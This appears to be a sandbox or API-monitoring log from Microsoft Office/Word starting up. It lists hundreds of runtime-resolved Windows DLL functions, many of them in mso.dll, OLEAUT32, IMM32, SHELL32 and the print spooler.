DynamicLoader: SHELL32.DLL/SHGetSpecialFolderLocation
DynamicLoader: SHELL32.DLL/SHGetFileInfoA
DynamicLoader: SHELL32.DLL/SHGetFileInfoW
DynamicLoader: SHELL32.DLL/ExtractIconExA
DynamicLoader: SHELL32.DLL/ExtractIconW
DynamicLoader: SHELL32.DLL/DllGetClassObject
DynamicLoader: SHELL32.DLL/DragQueryPoint
DynamicLoader: SHELL32.DLL/DragQueryFileA
DynamicLoader: SHELL32.DLL/DragQueryFileW
DynamicLoader: SHELL32.DLL/DragFinish
DynamicLoader: SHELL32.DLL/DragAcceptFiles
DynamicLoader: SHELL32.DLL/ExtractIconA
DynamicLoader: SHELL32.DLL/ShellExecuteA
DynamicLoader: SHELL32.DLL/ShellExecuteW
DynamicLoader: SHELL32.DLL/ShellExecuteExA
DynamicLoader: SHELL32.DLL/ShellExecuteExW
DynamicLoader: SHELL32.DLL/SHAppBarMessage
DynamicLoader: SHELL32.DLL/FindExecutableA
DynamicLoader: SHELL32.DLL/FindExecutableW
DynamicLoader: SHELL32.DLL/
DynamicLoader: SHELL32.DLL/SHGetSpecialFolderPathA
DynamicLoader: SHELL32.DLL/SHGetSpecialFolderPathW
DynamicLoader: SHELL32.DLL/SHChangeNotify
DynamicLoader: SHELL32.DLL/SHAddToRecentDocs
DynamicLoader: SHELL32.DLL/SHFileOperationA
DynamicLoader: SHELL32.DLL/SHFileOperationW
DynamicLoader: SHELL32.DLL/ExtractIconExW
DynamicLoader: SHELL32.DLL/
DynamicLoader: SHELL32.DLL/
DynamicLoader: SHELL32.DLL/
DynamicLoader: SHELL32.DLL/Shell_NotifyIconA
DynamicLoader: SHELL32.DLL/Shell_NotifyIconW
DynamicLoader: SHELL32.DLL/SHCreateItemFromParsingName
DynamicLoader: SHELL32.DLL/
DynamicLoader: SHELL32.DLL/
DynamicLoader: SHELL32.DLL/
DynamicLoader: SHELL32.DLL/
DynamicLoader: SHELL32.DLL/
DynamicLoader: SHELL32.DLL/
DynamicLoader: SHELL32.DLL/
DynamicLoader: SHELL32.DLL/
DynamicLoader: SHELL32.DLL/
DynamicLoader: SHELL32.DLL/
DynamicLoader: SHELL32.DLL/
DynamicLoader: SHELL32.DLL/SHCreateItemFromIDList
DynamicLoader: SHELL32.DLL/SHGetKnownFolderIDList
DynamicLoader: SHELL32.DLL/SHBindToParent
DynamicLoader: SHELL32.DLL/SHGetFolderPathW
DynamicLoader: SHELL32.DLL/SHSetTemporaryPropertyForItem
DynamicLoader: SHELL32.DLL/SHRestricted
DynamicLoader: SHELL32.DLL/SHCreateShellItemArrayFromIDLists
DynamicLoader: SHELL32.DLL/SHGetFolderLocation
DynamicLoader: SHELL32.DLL/SHParseDisplayName
DynamicLoader: mso.dll/
DynamicLoader: kernel32.dll/SwitchToThread
DynamicLoader: kernel32.dll/TryEnterCriticalSection
DynamicLoader: kernel32.dll/SetCriticalSectionSpinCount
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: IMM32.DLL/ImmDisableIME
DynamicLoader: USER32.dll/RegisterPowerSettingNotification
DynamicLoader: POWRPROF.DLL/PowerSettingRegisterNotification
DynamicLoader: USER32.dll/GetWindowThreadProcessId
DynamicLoader: USER32.dll/GetWindowTextW
DynamicLoader: POWRPROF.DLL/PowerSettingRegisterNotification
DynamicLoader: POWRPROF.DLL/PowerSettingRegisterNotification
DynamicLoader: POWRPROF.DLL/PowerSettingRegisterNotification
DynamicLoader: POWRPROF.DLL/PowerSettingRegisterNotification
DynamicLoader: POWRPROF.DLL/PowerSettingRegisterNotification
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: IMM32.DLL/ImmAssociateContext
DynamicLoader: IMM32.DLL/ImmConfigureIMEA
DynamicLoader: IMM32.DLL/ImmCreateContext
DynamicLoader: IMM32.DLL/ImmDestroyContext
DynamicLoader: IMM32.DLL/ImmEscapeA
DynamicLoader: IMM32.DLL/ImmGetCandidateWindow
DynamicLoader: IMM32.DLL/ImmGetCompositionFontA
DynamicLoader: IMM32.DLL/ImmGetCompositionStringA
DynamicLoader: IMM32.DLL/ImmGetCompositionWindow
DynamicLoader: IMM32.DLL/ImmGetContext
DynamicLoader: IMM32.DLL/ImmGetConversionStatus
DynamicLoader: IMM32.DLL/ImmGetDefaultIMEWnd
DynamicLoader: IMM32.DLL/ImmGetDescriptionA
DynamicLoader: IMM32.DLL/ImmGetIMEFileNameA
DynamicLoader: IMM32.DLL/ImmGetOpenStatus
DynamicLoader: IMM32.DLL/ImmGetProperty
DynamicLoader: IMM32.DLL/ImmGetVirtualKey
DynamicLoader: IMM32.DLL/ImmIsIME
DynamicLoader: IMM32.DLL/ImmIsUIMessageA
DynamicLoader: IMM32.DLL/ImmNotifyIME
DynamicLoader: IMM32.DLL/ImmRegisterWordA
DynamicLoader: IMM32.DLL/ImmReleaseContext
DynamicLoader: IMM32.DLL/ImmSetCandidateWindow
DynamicLoader: IMM32.DLL/ImmSetCompositionFontA
DynamicLoader: IMM32.DLL/ImmSetCompositionStringA
DynamicLoader: IMM32.DLL/ImmSetCompositionWindow
DynamicLoader: IMM32.DLL/ImmSetConversionStatus
DynamicLoader: IMM32.DLL/ImmSetOpenStatus
DynamicLoader: IMM32.DLL/ImmSetStatusWindowPos
DynamicLoader: IMM32.DLL/ImmConfigureIMEW
DynamicLoader: IMM32.DLL/ImmEscapeW
DynamicLoader: IMM32.DLL/ImmGetCompositionFontW
DynamicLoader: IMM32.DLL/ImmGetCompositionStringW
DynamicLoader: IMM32.DLL/ImmGetDescriptionW
DynamicLoader: IMM32.DLL/ImmGetIMEFileNameW
DynamicLoader: IMM32.DLL/ImmIsUIMessageW
DynamicLoader: IMM32.DLL/ImmRegisterWordW
DynamicLoader: IMM32.DLL/ImmSetCompositionFontW
DynamicLoader: IMM32.DLL/ImmSetCompositionStringW
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: ole32.dll/CoGetApartmentType
DynamicLoader: ole32.dll/CoRegisterInitializeSpy
DynamicLoader: VERSION.dll/GetFileVersionInfoSizeA
DynamicLoader: VERSION.dll/GetFileVersionInfoA
DynamicLoader: VERSION.dll/VerQueryValueA
DynamicLoader: ADVAPI32.dll/RegEnumKeyA
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: Comctl32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoGetMalloc
DynamicLoader: ole32.dll/StringFromGUID2
DynamicLoader: ADVAPI32.dll/OpenThreadToken
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: ole32.dll/CreateBindCtx
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: Comctl32.dll/
DynamicLoader: Comctl32.dll/
DynamicLoader: Comctl32.dll/
DynamicLoader: Comctl32.dll/
DynamicLoader: Comctl32.dll/
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_Size_ExW
DynamicLoader: ADVAPI32.dll/RegEnumKeyW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_ExW
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: Comctl32.dll/
DynamicLoader: ADVAPI32.dll/InitializeSecurityDescriptor
DynamicLoader: ADVAPI32.dll/SetEntriesInAclW
DynamicLoader: Comctl32.dll/
DynamicLoader: ntmarta.dll/GetMartaExtensionInterface
DynamicLoader: ADVAPI32.dll/SetSecurityDescriptorDacl
DynamicLoader: ADVAPI32.dll/IsTextUnicode
DynamicLoader: Comctl32.dll/
DynamicLoader: Comctl32.dll/
DynamicLoader: SHELL32.DLL/
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoRevokeInitializeSpy
DynamicLoader: Comctl32.dll/
DynamicLoader: mso.dll/
DynamicLoader: sechost.dll/LookupAccountNameLocalW
DynamicLoader: ADVAPI32.dll/LookupAccountSidW
DynamicLoader: sechost.dll/LookupAccountSidLocalW
DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
DynamicLoader: CRYPTSP.dll/CryptGenRandom
DynamicLoader: ole32.dll/NdrOleInitializeExtension
DynamicLoader: ole32.dll/CoGetClassObject
DynamicLoader: ole32.dll/CoGetMarshalSizeMax
DynamicLoader: ole32.dll/CoMarshalInterface
DynamicLoader: ole32.dll/CoUnmarshalInterface
DynamicLoader: ole32.dll/StringFromIID
DynamicLoader: ole32.dll/CoGetPSClsid
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: ole32.dll/CoReleaseMarshalData
DynamicLoader: ole32.dll/DcomChannelSetHResult
DynamicLoader: RpcRtRemote.dll/I_RpcExtInitializeExtensionPoint
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/NlsGetCacheUpdateCount
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: ole32.dll/CoRegisterInitializeSpy
DynamicLoader: ole32.dll/CoRevokeInitializeSpy
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: apphelp.dll/ApphelpCheckShellObject
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: VERSION.dll/GetFileVersionInfoA
DynamicLoader: VERSION.dll/GetFileVersionInfoSizeA
DynamicLoader: VERSION.dll/VerQueryValueA
DynamicLoader: VERSION.dll/GetFileVersionInfoW
DynamicLoader: VERSION.dll/GetFileVersionInfoSizeW
DynamicLoader: VERSION.dll/VerQueryValueW
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: kernel32.dll/HeapSetInformation
DynamicLoader: GKWord.dll/FValidateWordFile
DynamicLoader: GKWord.dll/HrInitHost
DynamicLoader: kernel32.dll/SwitchToThread
DynamicLoader: kernel32.dll/TryEnterCriticalSection
DynamicLoader: kernel32.dll/SetCriticalSectionSpinCount
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: RPCRT4.dll/NdrClientCall2
DynamicLoader: RPCRT4.dll/RpcStringBindingComposeW
DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingW
DynamicLoader: RPCRT4.dll/RpcBindingSetAuthInfoExW
DynamicLoader: RPCRT4.dll/RpcStringFreeW
DynamicLoader: RPCRT4.dll/RpcBindingFree
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: RPCRT4.dll/RpcMgmtIsServerListening
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: Winspool.DRV/StartDocDlgW
DynamicLoader: Winspool.DRV/OpenPrinterW
DynamicLoader: Winspool.DRV/ResetPrinterW
DynamicLoader: Winspool.DRV/ClosePrinter
DynamicLoader: Winspool.DRV/GetPrinterW
DynamicLoader: Winspool.DRV/GetPrinterDriverW
DynamicLoader: Winspool.DRV/EndDocPrinter
DynamicLoader: Winspool.DRV/EndPagePrinter
DynamicLoader: Winspool.DRV/ReadPrinter
DynamicLoader: Winspool.DRV/StartDocPrinterW
DynamicLoader: Winspool.DRV/StartPagePrinter
DynamicLoader: Winspool.DRV/AbortPrinter
DynamicLoader: Winspool.DRV/DocumentEvent
DynamicLoader: Winspool.DRV/QuerySpoolMode
DynamicLoader: Winspool.DRV/QueryRemoteFonts
DynamicLoader: Winspool.DRV/SeekPrinter
DynamicLoader: Winspool.DRV/QueryColorProfile
DynamicLoader: Winspool.DRV/SplDriverUnloadComplete
DynamicLoader: Winspool.DRV/DocumentPropertiesW
DynamicLoader: Winspool.DRV/
DynamicLoader: Winspool.DRV/IsValidDevmodeW
DynamicLoader: Winspool.DRV/GetSpoolFileHandle
DynamicLoader: Winspool.DRV/CommitSpoolData
DynamicLoader: Winspool.DRV/CloseSpoolFileHandle
DynamicLoader: Winspool.DRV/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: mso.dll/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: GDI32.dll/GetCharABCWidthsI
DynamicLoader: USP10.DLL/ScriptGetFontScriptTags
DynamicLoader: GDI32.dll/GdiRealizationInfo
DynamicLoader: GDI32.dll/FontIsLinked
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: USP10.DLL/ScriptGetFontLanguageTags
DynamicLoader: USP10.DLL/ScriptGetFontFeatureTags
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: mso.dll/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: ole32.dll/PropVariantClear
DynamicLoader: OLEAUT32.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: USER32.dll/NotifyWinEvent
DynamicLoader: ADVAPI32.dll/RegQueryValueW
DynamicLoader: riched20.dll/CreateTextServices
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: SXS.DLL/SxsOleAut32MapReferenceClsidToConfiguredClsid
DynamicLoader: mso.dll/
DynamicLoader: SXS.DLL/SxsOleAut32RedirectTypeLibrary
DynamicLoader: ADVAPI32.dll/RegOpenKeyW
DynamicLoader: ADVAPI32.dll/RegQueryValueW
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/IsProcessorFeaturePresent
DynamicLoader: VBE7.DLL/DllVbeInit
DynamicLoader: mso.dll/_MsoInitGimme@12
DynamicLoader: mso.dll/_MsoFGimmeFeatureEx@8
DynamicLoader: mso.dll/_MsoFGimmeComponentEx@24
DynamicLoader: mso.dll/_MsoFGimmeComponentEx@20
DynamicLoader: mso.dll/_MsoFGimmeFileEx@24
DynamicLoader: mso.dll/_MsoFGimmeFileEx@20
DynamicLoader: mso.dll/_MsoSetLVProperty@8
DynamicLoader: mso.dll/_MsoVBADigSigCallDlg@20
DynamicLoader: mso.dll/_MsoVbaInitSecurity@4
DynamicLoader: mso.dll/_MsoFIEPolicyAndVersion@8
DynamicLoader: mso.dll/_MsoFUseIEFeature@8
DynamicLoader: mso.dll/_MsoFAnsiCodePageSupportsLCID@8
DynamicLoader: mso.dll/_MsoFInitOffice@20
DynamicLoader: mso.dll/_MsoUninitOffice@4
DynamicLoader: mso.dll/_MsoFGetFontSettings@20
DynamicLoader: mso.dll/_MsoRgchToRgwch@16
DynamicLoader: mso.dll/_MsoHrSimpleQueryInterface@16
DynamicLoader: mso.dll/_MsoHrSimpleQueryInterface2@20
DynamicLoader: mso.dll/_MsoFCreateControl@36
DynamicLoader: mso.dll/_MsoFLongLoad@8
DynamicLoader: mso.dll/_MsoFLongSave@8
DynamicLoader: mso.dll/_MsoFGetTooltips@0
DynamicLoader: mso.dll/_MsoFSetTooltips@4
DynamicLoader: mso.dll/_MsoFLoadToolbarSet@24
DynamicLoader: mso.dll/_MsoFCreateToolbarSet@28
DynamicLoader: mso.dll/_MsoInitShrGlobal@4
DynamicLoader: mso.dll/_MsoHpalOffice@0
DynamicLoader: mso.dll/_MsoFWndProcNeeded@4
DynamicLoader: mso.dll/_MsoFWndProc@24
DynamicLoader: mso.dll/_MsoFCreateITFCHwnd@20
DynamicLoader: mso.dll/_MsoDestroyITFC@4
DynamicLoader: mso.dll/_MsoFPitbsFromHwndAndMsg@12
DynamicLoader: mso.dll/_MsoFGetComponentManager@4
DynamicLoader: mso.dll/_MsoMultiByteToWideChar@24
DynamicLoader: mso.dll/_MsoWideCharToMultiByte@32
DynamicLoader: mso.dll/_MsoHrRegisterAll@0
DynamicLoader: mso.dll/_MsoFSetComponentManager@4
DynamicLoader: mso.dll/_MsoFCreateStdComponentManager@20
DynamicLoader: mso.dll/_MsoFHandledMessageNeeded@4
DynamicLoader: mso.dll/_MsoPeekMessage@8
DynamicLoader: mso.dll/_MsoGetWWWCmdInfo@20
DynamicLoader: mso.dll/_MsoFExecWWWHelp@8
DynamicLoader: mso.dll/_MsoFCreateIPref@28
DynamicLoader: mso.dll/_MsoDestroyIPref@4
DynamicLoader: mso.dll/_MsoChsFromLid@4
DynamicLoader: mso.dll/_MsoCpgFromChs@4
DynamicLoader: mso.dll/_MsoSetLocale@4
DynamicLoader: mso.dll/_MsoFSetHMsoinstOfSdm@4
DynamicLoader: mso.dll/_MsoVBADigSig2CallDlgEx@28
DynamicLoader: mso.dll/_MsoVbaInitSecurityEx@4
DynamicLoader: propsys.dll/PSCreateMemoryPropertyStore
DynamicLoader: propsys.dll/
DynamicLoader: OLEAUT32.dll/SysFreeString
DynamicLoader: OLEAUT32.dll/LoadTypeLib
DynamicLoader: OLEAUT32.dll/RegisterTypeLib
DynamicLoader: OLEAUT32.dll/QueryPathOfRegTypeLib
DynamicLoader: OLEAUT32.dll/UnRegisterTypeLib
DynamicLoader: OLEAUT32.dll/OleTranslateColor
DynamicLoader: OLEAUT32.dll/OleCreateFontIndirect
DynamicLoader: OLEAUT32.dll/OleCreatePictureIndirect
DynamicLoader: OLEAUT32.dll/OleLoadPicture
DynamicLoader: OLEAUT32.dll/OleCreatePropertyFrameIndirect
DynamicLoader: OLEAUT32.dll/OleCreatePropertyFrame
DynamicLoader: OLEAUT32.dll/OleIconToCursor
DynamicLoader: OLEAUT32.dll/LoadTypeLibEx
DynamicLoader: OLEAUT32.dll/OleLoadPictureEx
DynamicLoader: USER32.dll/GetSystemMetrics
DynamicLoader: USER32.dll/MonitorFromWindow
DynamicLoader: USER32.dll/MonitorFromRect
DynamicLoader: USER32.dll/MonitorFromPoint
DynamicLoader: USER32.dll/EnumDisplayMonitors
DynamicLoader: USER32.dll/GetMonitorInfoA
DynamicLoader: USER32.dll/EnumDisplayDevicesA
DynamicLoader: OLEAUT32.dll/DispCallFunc
DynamicLoader: OLEAUT32.dll/LoadTypeLibEx
DynamicLoader: OLEAUT32.dll/UnRegisterTypeLib
DynamicLoader: OLEAUT32.dll/CreateTypeLib2
DynamicLoader: OLEAUT32.dll/VarDateFromUdate
DynamicLoader: OLEAUT32.dll/VarUdateFromDate
DynamicLoader: OLEAUT32.dll/GetAltMonthNames
DynamicLoader: OLEAUT32.dll/VarNumFromParseNum
DynamicLoader: OLEAUT32.dll/VarParseNumFromStr
DynamicLoader: OLEAUT32.dll/VarDecFromR4
DynamicLoader: OLEAUT32.dll/VarDecFromR8
DynamicLoader: OLEAUT32.dll/VarDecFromDate
DynamicLoader: OLEAUT32.dll/VarDecFromI4
DynamicLoader: OLEAUT32.dll/VarDecFromCy
DynamicLoader: OLEAUT32.dll/VarR4FromDec
DynamicLoader: OLEAUT32.dll/GetRecordInfoFromTypeInfo
